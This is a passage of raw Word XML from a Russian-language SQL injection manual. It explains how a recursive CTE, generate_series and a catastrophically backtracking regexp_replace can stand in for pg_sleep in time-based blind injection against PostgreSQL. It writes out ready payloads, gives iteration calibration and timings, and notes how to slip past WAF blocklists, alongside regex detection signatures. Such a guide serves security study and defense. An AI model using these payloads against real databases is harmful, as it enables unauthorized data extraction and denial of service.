          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.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CTE side effects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.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MERGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — связка с 3.17.2 через MERGE в CTE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10.2 CTE как амплификатор time-based</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.10.0.</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Категория 3.4 (time-based blind) полагается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как примитив контролируемой задержки: атакующий измеряет, выполнилась ли ветка условия, по тому, спал ли ответ HTTP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секунд. Когда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блокируется WAF (см. 3.9.0, паттерн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атакующему нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">альтернативный примитив задержки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — без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payload-тексте, но с тем же эффектом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursive CTE — наиболее универсальный заменитель: одной конструкцией PG генерирует delay, пропорциональный количеству итераций. Дополнительные CPU-bound альтернативы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с агрегатом, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с экспоненциальной regex-сложностью, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgcrypto.crypt(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с высоким bcrypt-cost. Все они дают oracle-уровень для time-based blind без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Recursive CTE — особый случай: задержка контролируется параметром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(количество итераций), легко калибруется под целевые 5–10 секунд для надёжной HTTP-измеримости. Память тоже растёт линейно — на больших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падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">out of memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что само по себе сигнал атаки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — recursive CTE как pg_sleep-заменитель</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: time-based oracle на условии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT current_setting('app.role') = 'admin')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. WAF блокирует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Атакующий хочет получить boolean answer через timing.</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where_clause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id IS NOT NULL AND (CASE WHEN (SELECT current_setting('app.role')='admin') THEN (SELECT count(*) FROM (WITH RECURSIVE r(n) AS (SELECT 1 UNION ALL SELECT n+1 FROM r WHERE n&lt;5000000) SELECT 1 FROM r) sub) &gt; 0 ELSE false END)</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customer_name, total FROM orders_visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  CASE WHEN (SELECT current_setting('app.role')='admin') THEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    (SELECT count(*) FROM (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      WITH RECURSIVE r(n) AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT n+1 FROM r WHERE n&lt;5000000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1 FROM r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) sub) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ELSE false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  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Поведение: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Если `app.role = 'admin'`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG исполняет CTE, итерирует 5 миллионов раз, считает count. Время — несколько секунд (зависит от железа; на типичном CI-инстансе AWS r5.xlarge — ~3-4 секунды для 5M; для 10M — ~7-8s).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Если `app.role != 'admin'`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CASE WHEN false THEN ... ELSE false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> короткозамыкается; CTE не исполняется. Ответ — мгновенный.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий измеряет HTTP-RTT через несколько запросов и узнаёт, был ли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app.role = 'admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean oracle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подбор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 итеративно: атакующий начинает с малого (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=100000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), измеряет RTT, удваивает, пока не достигнет надёжных 3-5 секунд относительно baseline. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=5000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даёт 5 секунд — атакующий использует это значение в payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — generate_series как простой CPU-bound delay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернатива recursive CTE — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Не CTE по форме, но семантически близко: PG генерирует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строк и затем агрегирует, давая delay.</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id IS NOT NULL AND (SELECT count(*) FROM generate_series(1, 100000000)) &gt; 0</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customer_name, total FROM orders_visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND (SELECT count(*) FROM generate_series(1, 100000000)) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series(1, 100000000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 100 миллионов целых; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">count(*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> агрегирует — около 5–8 секунд на типичном железе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда выбрать generate_series vs recursive CTE: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 компактнее (одна строка vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но имя функции легко в WAF blacklist.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Recursive CTE — длиннее, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> редко блокируется (легитимная конструкция: дерево комментариев, иерархия категорий, BOM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сигнатура атаки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bgenerate_series\s*\(\s*\d+\s*,\s*\d{7,}</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\bWITH\s+RECURSIVE\b.*?\b\d{6,}\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — детектор больших N.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — regexp_replace с catastrophic backtracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Третий вариант — экспоненциально-медленный regex. Не CTE, но категория «альтернативный delay-примитив» — здесь логичное место.</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id IS NOT NULL AND regexp_replace(repeat('a', 30), '(a+)+b', 'x') = repeat('a', 30)</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customer_name, total FROM orders_visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
